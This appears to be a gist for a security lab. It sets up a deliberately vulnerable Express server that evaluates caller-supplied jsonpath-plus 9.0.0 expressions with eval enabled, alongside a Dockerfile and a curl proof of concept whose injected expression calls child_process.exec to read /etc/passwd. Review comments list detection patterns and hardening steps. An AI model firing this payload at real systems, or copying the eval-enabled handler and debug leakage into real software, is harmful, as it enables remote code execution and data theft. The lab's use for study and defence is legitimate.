@pabloopez
Created November 11, 2024 10:34
index.js
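# Lab image for the jsonpath-plus demo server in index.js.
# The base image and the jsonpath-plus version are pinned to old releases on
# purpose: the demo depends on the behaviour of that specific library version.
FROM node:18.0

# All application files live under /app inside the container.
WORKDIR /app

# Only package.json is copied before the install (no lockfile), so the
# "express": "^4.17.1" range is resolved at build time and two builds can
# end up with different transitive dependencies.
COPY package.json ./

# package.json already pins jsonpath-plus to 9.0.0; the explicit second
# install re-states that pin so the image cannot drift to a newer release.
RUN npm install && npm install jsonpath-plus@9.0.0

# Copies the whole build context. Without a .dockerignore this also brings in
# the Dockerfile, the curl script and any host-side node_modules directory.
COPY . .

# Port the Express server listens on (index.js falls back to 3000).
EXPOSE 3000

# Print the resolved jsonpath-plus version into the container log first, so
# the log records which library version the server is actually running.
CMD ["sh", "-c", "npm list jsonpath-plus && node index.js"]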
#!/bin/bash
# Reproduction request for the lab server defined in index.js.
# Sends a single POST to /query on localhost:3000 with an empty "json" document
# and a "path" whose script expression walks this.constructor.constructor to
# obtain the Function constructor and is intended to call child_process.exec.
# The server passes "path" straight to JSONPath with eval enabled, so the
# expression is evaluated server-side.
#
# NOTE(review): as rendered here the -d body does not parse as JSON, so
# express.json() would reject it before the /query handler runs; the original
# quoting appears to have been lost in extraction.
#
# Detection notes: the injected call has no callback and no return value, so
# command output is not expected in the HTTP response. Look instead for
# request bodies to JSONPath-backed endpoints containing
# "constructor.constructor" or "child_process", and for the node process
# spawning a shell child.
curl -X POST http://localhost:3000/query \
-H "Content-Type: application/json" \
-d '{"json": {}, "path": "$[(this.constructor.constructor("require(\"child_process\").exec(\"cat /etc/passwd\")")())]"}'
// Dependencies: Express for HTTP, jsonpath-plus for path evaluation.
const express = require('express');
const { JSONPath } = require('jsonpath-plus'); // Using version 9.0.0

// Express application; JSON request bodies are parsed into req.body.
const app = express();
app.use(express.json());

/**
 * POST /query — evaluates the caller-supplied JSONPath `path` against the
 * caller-supplied `json` document and returns the matches.
 *
 * NOTE(review): both inputs come straight from the request body and `eval`
 * is enabled, so script/filter expressions inside `path` are executed by the
 * library. This is the intentionally vulnerable part of the demo. Outside a
 * lab, pass `eval: false`, run a patched jsonpath-plus release, and do not
 * accept path expressions from untrusted callers.
 *
 * NOTE(review): every response carries a `debug` array that echoes the
 * request, the evaluation config and internal error messages back to the
 * caller, which discloses internals if this pattern is copied elsewhere.
 */
app.post('/query', (req, res) => {
  const debugLog = [];
  const note = (line) => {
    debugLog.push(line);
  };

  try {
    const document = req.body.json;
    const expression = req.body.path;
    note(`Received JSON: ${JSON.stringify(document)}`);
    note(`Received Path: ${expression}`);

    // Key order (json, path, eval) is kept so the logged config is unchanged.
    const options = { json: document, path: expression, eval: true };
    note(`JSONPath Config: ${JSON.stringify(options)}`);

    let matches;
    try {
      matches = JSONPath(options);
      note(`JSONPath Evaluation Success: ${JSON.stringify(matches)}`);
    } catch (jsonPathError) {
      // Evaluation (or serialising its result) failed: report it and stop.
      note(`JSONPath Evaluation Failed: ${jsonPathError.message}`);
      res.status(500).json({
        error: `Error evaluating JSONPath: ${jsonPathError.message}`,
        debug: debugLog,
      });
      return;
    }

    note(`JSONPath Result: ${JSON.stringify(matches)}`);
    res.json({ result: matches, debug: debugLog });
  } catch (err) {
    // Anything thrown outside the evaluation step ends up here.
    note(`Error evaluating JSONPath or executing script: ${err.message}`);
    res.status(500).json({
      error: 'Error evaluating JSONPath or executing script',
      debug: debugLog,
    });
  }
});

// GET /health — static liveness response; touches no request data.
app.get('/health', (_req, res) => {
  res.json({ status: 'Healthy' });
});

// Listen on PORT from the environment, falling back to 3000.
// No host is passed to listen(), so Node binds to all interfaces; given the
// /query route above, publish the container port on loopback only.
const listenPort = process.env.PORT || 3000;
app.listen(listenPort, () => {
  console.log(`Server is running on port ${listenPort}`);
});
{
"name": "vulnerable-node-app",
"version": "1.0.0",
"description": "A vulnerable Node.js app for security demonstration purposes",
"main": "index.js",
"scripts": {
"start": "node index.js"
},
"dependencies": {
"express": "^4.17.1",
"jsonpath-plus": "9.0.0"
},
"author": "Your Name",
"license": "ISC"
}